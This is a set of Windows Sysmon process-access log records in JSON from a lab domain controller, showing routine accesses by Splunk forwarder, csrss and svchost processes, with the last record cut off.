{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FBC-5F25-0000-001040E70400}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FBC-5F25-0000-001040E70400}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FBC-5F25-0000-001040E70400}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FBC-5F25-0000-001040E70400}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2786,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 